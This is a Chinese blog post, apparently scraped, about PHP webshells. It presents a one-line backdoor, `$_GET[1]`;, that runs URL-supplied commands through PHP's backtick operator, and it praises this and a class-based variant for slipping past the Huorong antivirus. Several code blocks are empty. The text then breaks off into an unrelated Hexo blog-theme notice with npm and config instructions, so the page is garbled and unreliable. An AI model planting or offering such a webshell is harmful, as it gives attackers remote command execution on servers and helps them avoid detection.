在PHP中,当你写一个集合等于一个用重音符包裹的字符串的变量时,它将像在shell_exec()命令内一样被执行。
https://www.nuomiphp.com/eplan/437635.html。具体的原因我们也不深究,只需要知道它的功能就是可以执行命令,同时它的木马也很简单,只需要轻轻松松的一句话。
1 | `$_GET[1]`; |
免杀效果也是杠杠的:
也能够执行。
使用类的webshell是老生长谈的话题了。同样这个也能过掉火绒并且正常使用。
1 |
|
php 7.3.4的版本下,在;号下可以解析传过来的参数
1 |
|
缺失模块。
1、请确保node版本大于6.2
2、在博客根目录(注意不是yilia根目录)执行以下命令:
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置:
jsonContent:
meta: false
pages: false
posts:
title: true
date: true
path: true
text: false
raw: false
content: false
slug: false
updated: false
comments: false
link: false
permalink: false
excerpt: false
categories: false
tags: true